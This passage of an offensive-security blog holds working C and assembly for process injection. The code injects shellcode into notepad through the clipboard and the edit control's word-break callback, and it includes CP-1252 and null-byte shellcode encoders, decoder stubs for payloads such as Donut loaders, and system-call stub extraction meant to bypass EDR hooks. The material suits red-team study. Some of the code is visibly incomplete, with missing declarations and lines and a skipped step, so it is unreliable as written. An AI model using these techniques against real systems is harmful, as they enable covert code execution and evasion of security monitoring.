memcpy(out, CALC3, CALC3_SIZE);
out += CALC3_SIZE;

// initialize RDI for writing

// ***********************************
// store kernel32!WinExec on stack
m = GetModuleHandle("kernel32");
m = GetProcessModuleHandle(pid, "kernel32.dll");

// load a byte into AH

// if byte not allowed for CP1252, add 32
if(!is_cp1252_allowed(out[2])) {
out[2] += 32;
// subtract 32 from byte at runtime
out += SUB_BYTE_SIZE;
}
// store AH in [RDI], increment RDI
memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
out += STORE_BYTE_SIZE;
}

// calculate length of constructed code
ofs = (int)(out - (u8*)cs) + 2;

// first offset
cs[RET_OFS] = (uint8_t)ofs;

memcpy(out, RET, RET_SIZE);
out += RET_SIZE;

memcpy(out, CALC4, CALC4_SIZE);

// second offset
ofs = CALC4_SIZE;
((u8*)out)[RET_OFS2] = (uint8_t)ofs;
out += CALC4_SIZE;

outlen = ((int)(out - (u8*)cs) + 1) & -2;

// convert to ascii
for(i=0; i<=outlen; i+=2) {
cs[i/2] = cs[i];
}

*cslen = outlen / 2;
// return pointer to code
return cs;
}
```

## 5. Injecting and Executing Shellcode

The following steps are used.

1. Execute notepad.exe and obtain a window handle for the edit control.
2. Get the edit control handle using the EM_GETHANDLE message.
3. Generate text equivalent to, or greater than the size of the shellcode and copy it to the clipboard.
4. Assign a NULL pointer to lastbuf
5. Read the address of input buffer from the EM handle and assign to embuf.
6. If lastbuf and embuf are equal. Goto step 9.
7. Clear the memory buffer using WM_SETSEL and WM_CLEAR.
8. Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
10. Generate CP-1252 compatible shellcode and copy to the clipboard.
11. Set the edit control word break function to embuf using EM_SETWORDBREAKPROC
12. Trigger execution of shellcode using WM_LBUTTONDBLCLK
```BOOL em_inject(void) {
HWND   npw, ecw;
w64_t  emh, lastbuf, embuf;
SIZE_T rd;
HANDLE hp;
DWORD  cslen, pid, old;
BOOL   r;
PBYTE  cs;

char   buf[1024];

// get window handle for notepad class

// get window handle for edit control
ecw = FindWindowEx(npw, NULL, "Edit", NULL);

// get the EM handle for the edit control
emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);

// get the process id for the window

// open the process for reading and changing memory permissions
hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);

// copy some test data to the clipboard
memset(buf, 0x4d, sizeof(buf));
CopyToClipboard(CF_TEXT, buf, sizeof(buf));

// loop until target buffer address is stable
lastbuf.p = NULL;
r = FALSE;

for(;;) {
&embuf.p, sizeof(ULONG_PTR), &rd);

// Address hasn't changed? exit loop
if(embuf.p == lastbuf.p) {
r = TRUE;
break;
}
lastbuf.p = embuf.p;

// clear the contents of edit control
SendMessage(ecw, EM_SETSEL, 0, -1);
SendMessage(ecw, WM_CLEAR, 0, 0);

// send the WM_PASTE message to the edit control
SendMessage(ecw, WM_PASTE, 0, 0);
Sleep(WAIT_TIME);
}

if(r) {
// set buffer to RWX

// generate shellcode and copy to clipboard
cs = cp1252_generate_winexec(pid, &cslen);
CopyToClipboard(CF_TEXT, cs, cslen);

// clear buffer and inject shellcode
SendMessage(ecw, EM_SETSEL, 0, -1);
SendMessage(ecw, WM_CLEAR, 0, 0);
SendMessage(ecw, WM_PASTE, 0, 0);
Sleep(WAIT_TIME);

// set the word break procedure to address of shellcode and execute
SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);

// set buffer to RW
}
CloseHandle(hp);
return r;
}
```

## 6. Demonstration

Notepad doesnβt crash as a result of the shellcode running. The demo terminates it once the thread ends.

## 7. Encoding Arbitrary Data

Encoding data and code require different solutions. Raw data that doesnβt execute requires βbad charactersβ removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

### 7.1 Encoding

1. Read a byte from the input file or stream and assign to X.
2. If X plus 1 is allowed, goto step 6.
3. Save escape code (0x01) to the output file or stream.
4. XOR X with 8-Bit key.
5. Save X to the output file or stream, goto step 7.
6. Save X plus 1 to the output file or stream.
7. Repeat steps 1-6 until EOF.
```// encode raw data to CP-1252 compatible data
static
void cp1252_encode(FILE *in, FILE *out) {
uint8_t c, t;

for(;;) {
c = getc(in);
// end of file? exit
if(feof(in)) break;
// if the result of c + 1 is disallowed
if(!is_decoder_allowed(c + 1)) {
// write escape code
putc(0x01, out);
// save byte XOR'd with the 8-Bit key
putc(c ^ CP1252_KEY, out);
} else {
// save byte plus 1
putc(c + 1, out);
}
}
}
```

### 7.2 Decoding

1. Read a byte from the input file or stream and assign to X.
2. If X is not an escape code, goto step 6.
3. Read a byte from the input file or stream and assign to X.
4. XOR X with 8-Bit key.
5. Save X to the output file or stream, goto step 7.
6. Save X β 1 to the output file or stream.
7. Repeat steps 1-6 until EOF.
```// decode data processed with cp1252_encode to their original values
static
void cp1252_decode(FILE *in, FILE *out) {
uint8_t c, t;

for(;;) {
c = getc(in);
// end of file? exit
if(feof(in)) break;
// if this is an escape code
if(c == 0x01) {
c = getc(in);
// XOR the 8-Bit key
putc(c ^ CP1252_KEY, out);
} else {
// save byte minus one
putc(c - 1, out);
}
}
}
```

The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.

```; cp1252 decoder in 40 bytes of x86/amd64 assembly
; presumes to be executing in RWX memory
; needs stack allocation if executing from RX memory
;
; odzhan

bits 32

Β Β Β Β %define CP1252_KEY 0x4D

jmp    init_decode       ; read the program counter

; esi = source
; edi = destination
; ecx = length
decode_bytes:
dec    al                ; c - 1
jnz    save_byte
lodsb                    ; skip null byte
xor    al, CP1252_KEY    ; c ^= CP1252_KEY
save_byte:
stosb                    ; save in buffer
lodsb                    ; skip null byte
loop   decode_bytes
ret
pop    esi               ; esi = start of data
; ********************** ; decode the 32-bit length
push   0                 ; len = 0
push   esp               ;
pop    edi               ; edi = &len
push   4                 ; 32-bits
pop    ecx
call   decode_bytes
pop    ecx               ; ecx = len

; ********************** ; decode remainder of data
push   esi               ;
pop    edi               ; edi = encoded data
push   esi               ; save address for RET
jmp    decode_bytes
init_decode:
; CP1252 encoded data goes here..

```

The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.

## 9. Further Research

List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that arenβt listed here, feel free to email me with the details.

## 10. Code Scrapheap

What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 canβt be used.

```"\xb0\x00"     /* mov  al, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\xb4\x00"     /* mov  ah, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\x98"         /* cwde                   */
```

Another idea for seting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? π Well, the ADD affects the Carry Flag, so thatβs why it doesnβt work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

```"\xf8"                 /* clc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

```"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

```"\x6a\x00"             /* push  0                     */
"\x58"                 /* pop   rax                   */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\xf9"                 /* stc                         */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\x14\x00"             /* adc   al, 0                 */
```

Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.

```"\x6a\x00"     /* push 0                 */
"\x54"         /* push rsp               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xff\x00"     /* inc  dword [rax]       */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x99"         /* cdq                    */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x92"         /* xchg eax, edx          */
```

I examined various ways to simulate instructions and conceded it could only work using self-modifying code. Using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address of where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. Thereβs no JMP, Jcc or CALL instructions that can be used directly.

If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

```"\x39\xd8"             /* cmp   eax, ebx           */
```

Thereβs no simple combination of registers used with CMP or SUB thatβs compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generates the wrong result.

```"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5e"                 /* pop   rsi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x53"                 /* push  rbx                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xa7"                 /* cmpsd                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x1c\x00"             /* sbb   al, 0                  */
"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
```

Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

```"\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x9e"                 /* sahf                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
```

Two problems: SAHF is a byte we canβt use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored in address rbp contains and the value of CL.

Adding -1 will subtract 1 from the variable EAX contains the address of.

```"\x6a\x00"             /* push  0                    */
"\x54"                 /* push  rsp                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x83\x00\xff"         /* add   dword  [eax], -1  */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
```

Works fine, but because 0x83 converts to a double-byte encoding, we canβt use it.

Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into rdi. Store AL in variable four times before loading into RAX. Doesnβt work once the addition after STC is executed.

```"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1c\x00"             /* sbb   al, 0               */
"\x6a\x00"             /* push  0                   */
"\x54"                 /* push  rsp                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x5f"                 /* pop   rdi                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
```

The next snippet simply copies the value of RCX to RAX. Itβs overcomplicated and the POP QWORD instruction might be useful in some scenario. I just didnβt find it useful.

```"\x6a\x00"             /* push  0              */
"\x54"                 /* push  rsp            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x58"                 /* pop   rax            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x51"                 /* push  rcx            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x8f\x00"             /* pop   qword [rax]    */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x5f"                 /* pop   rax            */
```

Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isnβt useful.

```    push   0
pop    rcx
xnop
push   rbp              ; save rbp
xnop
; 1. ====================================
push   0                ; store 0 as X
push   rsp              ; store &X
xnop
xnop
; 2. ====================================
mov    eax, 0xFF001200  ; load 0xFF001200
adc    al, 0            ; AL = CF
push   rbp              ; store &X
xnop
push   rsp              ; store &&X
xnop
xnop
inc    dword[rax]       ; &X++
pop    rbp
xnop
; 3. ====================================
```

Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. Iβm leaving here in the event R8 is already zero..

```    ; read byte from table 2
lodsb
add byte[rax+r8+1], al   ; copy to table 1

lodsb

lodsb

; and so on..

; execute
push rax
ret
```

Using the above instruction to add 8-bits to 32-bit word.

```    ; step 1
push   rax              ; save pointer
add    byte[rax+r8], bl ; A[0] += B[0]
mov    al, 0
adc    al, 0            ; set carry
push   rax              ; save carry
pop    rcx              ; load carry into CL
pop    rax              ; restore pointer

; step 2
push   rax              ; save pointer
rol    dword[rax], 24
add    byte[rax+r8], cl ; A[1] += CF
mov    al, 0
adc    al, 0            ; set carry
push   rax              ; save carry
pop    rcx              ; load carry into CL
pop    rax              ; restore pointer

; step 3
push   rax              ; save pointer
rol    dword[rax], 24
add    byte[rax+r8], cl ; A[2] += CF
mov    al, 0
adc    al, 0            ; set carry
push   rax              ; save carry
pop    rcx              ; load carry into CL
pop    rax              ; restore pointer

; step 4
push   rax              ; save pointer
rol    dword[rax], 24
add    byte[rax+r8], cl ; A[3] += CF
mov    al, 0
adc    al, 0            ; set carry
push   rax              ; save carry
pop    rcx              ; load carry into CL
pop    rax              ; restore pointer

; step 5
rol    dword[rax], 24
```

As you can see, itβs a mess to try simulate instructions instead of just writing the code to memory and executing that wayβ¦or use CF_UNICODETEXT for copying to the clipboard. π

calc_ss

odzhan

modexp

# Shellcode: Encoding Null Bytes Faster With Escape Sequences

## Introduction

Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. Itβs also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe βescape codesβ is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

## XOR Cipher

Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. Itβs also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what Iβd probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24-Bits.

```int find_xor_key(
const void *inbuf, u32 inlen,
void *outbuf, int outlen)
{
int i, j, keylen=1;
u8  *in = (u8*)inbuf, *key=(u8*)outbuf;

// initialize key
for(i=0; i<outlen; i++) {
key[i] = (i < keylen) ? 0 : -1;
}

// while keylen is less than max key requested
while(keylen < outlen) {
// xor data with current key
for(i=0; i<inlen; i++) {
// if the result of xor is zero. end loop
if((in[i] ^ key[i % keylen]) == 0) break;
}
// if we processed all data successfully
if(i == inlen) {
// return current key and its length
return keylen;
}
// otherwise, update the key
for(i=0; ; i++) {
if(++key[i]) break;
}
// update the key length
if(i == keylen) keylen++;
}
// return nothing found
return 0;
}
```

The following function can be used to test it and works relatively fast for something thatβs compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

```void test_key(void) {
int i, keylen;
u8  key[8], data[1024];

srand(time(0));

// fill buffer with pseudo-random bytes
for(i=0; i<sizeof(data); i++) {
data[i] = rand();
}
// try find a suitable XOR key for the data
keylen = find_xor_key(data, sizeof(data), key, sizeof(key));

printf("Suitable key %sfound.\n\n",
keylen ? "" : "could not be ");

if(keylen) {
printf("Key length : %i\nKey        : ", keylen);
while(keylen--) {
printf("%02x ", key[keylen]);
}
putchar('\n');
}
}
```

find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isnβt finding a key. Weβre not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.

## Encoding Algorithm

Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. Iβm not sure if Iβm using the correct terminology for what I describe next, but hopefully youβll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

1. Read a byte from the input file or stream and assign to X.
2. Assign X plus 1 to Y.
3. If Y is not 0 or 1, goto step 6.
4. Save the escape sequence 0x01 to the output file or stream.
5. XOR X with predefined 8-Bit key K, goto step 7.
7. Save X to the output file or stream.
8. Repeat step 1-7 until EOF.

Although I use an XOR cipher in step 5, it could be replaced with something else.

```static
void nullz_encode(FILE *in, FILE *out) {
char c, t;

for(;;) {
c = getc(in);
// end of file? exit
if(feof(in)) break;
// adding one is just an example
t = c + 1;
// is the result 0(avoid) or 1(escape)?
if(t == 0 || t == 1) {
// write escape sequence
putc(0x01, out);
// The XOR is an optional step.
// Avoid using 0x00 or 0xFF with XOR!
putc(c ^ NULLZ_KEY, out);
} else {
// save byte plus 1
putc(c + 1, out);
}
}
}
```

## Decoding Algorithm

1. Read a byte from the input file or stream and assign to X.
2. If X is not an escape sequence 0x01, goto step 5.
3. Read a byte from the input file or stream and assign to X.
4. XOR X with predefined 8-Bit key K used for encoding, goto step 6.
5. Subtract 1 from X.
6. Save X to the output file or stream.
7. Repeat steps 1-6 until EOF.
```static
void nullz_decode(FILE *in, FILE *out) {
char c, t;

for(;;) {
c = getc(in);
// end of file? exit
if(feof(in)) break;
// if this is an escape sequence
if(c == 0x01) {
// read next byte and XOR it
c = getc(in);
// The XOR is an optional step.
putc(c ^ NULLZ_KEY, out);
} else {
// else subtract byte
putc(c - 1, out);
}
}
}
```

## x86/AMD64 assembly

This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

```    bits   32

Β Β Β Β %define NULLZ_KEY 0x4D

nullz_decode:
_nullz_decode:
jmp    init_code
pop    esi
lodsd                    ; load original length of data
xor    eax, 0x12345678   ; change to 32-bit key
xchg   eax, ecx
push   esi               ; save pointer to code on stack
pop    edi               ;
push   esi
decode_main:
dec    al                ; c - 1
jnz    save_byte
xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
save_byte:
stosb                    ; save in buffer
loop   decode_main
ret                      ; execute shellcode
init_code:
; XOR encoded shellcode goes here..
```

1. Allocate memory to hold the decoder, 32-bits for the original length of input file and file data itself.
2. Copy the decoder to memory.
3. Set the key in decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
4. Set the original length, encrypted with XOR, right after the decoder.
5. Set input file data right after the original length.
6. Save memory to file.

An option to update the XOR key is left up to you.

```// compatible with x86 and x86-64
char NULLZ_DECODER[] = {
/* 0000 */ "\xeb\x17"             /* jmp   0x19            */
/* 0002 */ "\x5e"                 /* pop   esi             */
/* 0003 */ "\xad"                 /* lodsd                 */
#define NULLZ_LEN 5
/* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
/* 0009 */ "\x91"                 /* xchg  eax, ecx        */
/* 000A */ "\x56"                 /* push  esi             */
/* 000B */ "\x5f"                 /* pop   edi             */
/* 000C */ "\x56"                 /* push  esi             */
/* 000D */ "\xac"                 /* lodsb                 */
/* 000E */ "\xfe\xc8"             /* dec   al              */
/* 0010 */ "\x75\x03"             /* jne   0x15            */
/* 0012 */ "\xac"                 /* lodsb                 */
/* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
/* 0015 */ "\xaa"                 /* stosb                 */
/* 0016 */ "\xe2\xf5"             /* loop  0xd             */
/* 0018 */ "\xc3"                 /* ret                   */
/* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
};
```

## Summary

Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.

encoder

odzhan

modexp

# Invoking System Calls and Windows Debugger Engine

## Introduction

Quick post about Windows System calls that I forgot about working on after the release of Dumpert by Cn33liz last year, which is described in this post. Typically, EDR and AV set hooks on Win32 API or NT wrapper functions to detect and mitigate against malicious activity. Dumpert attempts to bypass any user-level hooks by invoking system calls directly. It first queries the operating system version via RtlGetVersion and then selects the applicable code stubs to execute. SysWhispers generates header/ASM files by extracting the system call numbers from the code stubs in NTDLL.dll and evilsocket also demonstrated how to do this many years ago. @FuzzySec and @TheWover have also implemented dynamic invocation of system calls after remapping NTDLL in Sharpsploit, which you can read about in their Bluehat presentation.

Using system calls on Windows to interact with the kernel has always been problematic because the numbers assigned for each kernel function change between the versions released. Just after Cn33liz published Dumpert, I thought of how invocation might be improved without using assembly and there are lots of ways, but consider at least three for now. The first method, which is probably the simplest and safest, maps NTDLL.dll into executable memory and resolves the address of any system call via the Export Address Table (EAT) before executing. This is relatively simple to implement. The second approach maps NTDLL.dll into read-only memory and uses a disassembler, or at the very least, a length disassembler to extract the system call number. The third will also map NTDLL.dll into read-only memory, copy the code stub to an executable buffer before invoking. The length of the stub is read from the exception directory. Overcomplicated, perhaps, and I did consider a few disassembly libraries for the second method, but just to save time settled with the Windows Debugger Engine, which has a built-in disassembler already.

A PoC to inject a DLL into remote process can be found here. It doesnβt use a disassembler, but because it uses the exception directory to locate the end of a system call, it will only work with 64-bit processes.

## Windows Debugging Engine

Disassembling code via the engine requires a live process. Thankfully itβs possible to attach the debugger to the local process in noninvasive mode. You can just map NTDLL into executable memory and invoke any system call from there, however, I wanted an excuse to use the debugging engine. lde.c, lde.h

```LDE::LDE() {
CHAR path[MAX_PATH];

ctrl = NULL;
clnt = NULL;
// create a debugging client
hr = DebugCreate(__uuidof(IDebugClient), (void**)&clnt);
if(hr == S_OK) {
// get the control interface
hr = clnt->QueryInterface(__uuidof(IDebugControl3), (void**)&ctrl);
if(hr == S_OK) {
// attach to existing process
hr = clnt->AttachProcess(NULL,
GetProcessId(GetCurrentProcess()),
DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND);
if(hr == S_OK) {
hr = ctrl->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);
}
}
}
ExpandEnvironmentStrings("%SystemRoot%\\system32\\NTDLL.dll", path, MAX_PATH);
// open file
file = CreateFile(path,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if(file == INVALID_HANDLE_VALUE) return;

// map file
map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, NULL);
if(map == NULL) return;

// create read only view of map
mem = (LPBYTE)MapViewOfFile(map, FILE_MAP_READ, 0, 0, NULL);
}
```

WinDbg has a command to disassemble a complete function called uf (Unassemble Function). Internally, WinDbg builds a Control-flow Graph (CFG) to map the full function before displaying the disassembly of each code block. You can execute a command like uf via the Execute method and so long as youβve setup IDebugOutputCallbacks, you can capture the disassembly that way. I considered using a CFG to implement something similar to uf, which you can if you wish. The system calls on my own build of Windows 10 have at the most, one branch, so I scrapped the idea of using a CFG or executing uf. With NTDLL mapped, you can use something like the following to resolve the address of an exported API.

```FARPROC LDE::GetProcAddress(LPCSTR lpProcName) {
PIMAGE_DATA_DIRECTORY   dir;
PIMAGE_EXPORT_DIRECTORY exp;
DWORD                   rva, ofs, cnt;
PCHAR                   str;
PWORD                   ord;

if(mem == NULL || lpProcName == NULL) return NULL;

// get pointer to image directories for NTDLL
dir = Dirs();

// no exports? exit
if(rva == 0) return NULL;

ofs = rva2ofs(rva);
if(ofs == -1) return NULL;

// no exported symbols? exit
exp = (PIMAGE_EXPORT_DIRECTORY)(ofs + mem);
cnt = exp->NumberOfNames;
if(cnt == 0) return NULL;

if(ofs == -1) return NULL;
sym = (PDWORD)(ofs + mem);

if(ofs == -1) return NULL;

// read the array containing list of ordinals
if(ofs == -1) return NULL;
ord = (PWORD)(ofs + mem);

// scan symbol array for api string
do {
str = (PCHAR)(rva2ofs(sym[cnt - 1]) + mem);
// found it?
if(lstrcmp(str, lpProcName) == 0) {
return (FARPROC)(rva2ofs(adr[ord[cnt - 1]]) + mem);
}
} while (--cnt);
return NULL;
}
```

The following will use the Disassemble method to show the code. You can also use it to inspect bytes if you wanted to extract the system call number. The beginning and end of the system call is read from the Exception directory.

```bool LDE::DisassembleSyscall(LPCSTR lpSyscallName) {
PIMAGE_DATA_DIRECTORY         dir;
PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
DWORD                         i, rva;
CHAR                          buf[LDE_MAX_STR];
HRESULT                       hr;
ULONG                         len;

// resolve address of function in NTDLL

// get pointer to image directories
dir = Dirs();

// no exception directory? exit
if(rva == 0) return false;

ofs = rva2ofs(rva);
if(ofs == -1) return false;

rf = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(ofs + mem);

// for each runtime function (there might be a better way??)
for(i=0; rf[i].BeginAddress != 0; i++) {
// is it our system call?
// save end and exit search
break;
}
}

if(start != 0 && end != 0) {
while(start < end) {
hr = ctrl->Disassemble(
start, 0, buf, LDE_MAX_STR, &len, &start);

if(hr != S_OK) break;

printf("%s", buf);
}
}
return true;
}
```

The following code will disassemble the system call.

```int main(int argc, char *argv[]) {
LDE *lde;

if(argc != 2) {
printf("usage: dis <system call name>\n");
return 0;
}

// create length disassembly engine
lde = new LDE();

lde->DisassembleSyscall(argv[1]);

delete lde;

return 0;
}
```

Just to illustrate disassembly of NtCreateThreadEx and NtWriteVirtualMemory. The address of SharedUserData doesnβt change and therefore doesnβt require fixups to the code just because itβs been mapped somewhere else.

## Invoking

Simply copy the code for the system call to memory allocated by VirtualAlloc with PAGE_EXECUTE_READWRITE permissions. Rewriting the above code, we have something like the following.

```LPVOID LDE::GetSyscallStub(LPCSTR lpSyscallName) {
PIMAGE_DATA_DIRECTORY         dir;
PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
DWORD                         i, rva;
SIZE_T                        len;
LPVOID                        cs = NULL;

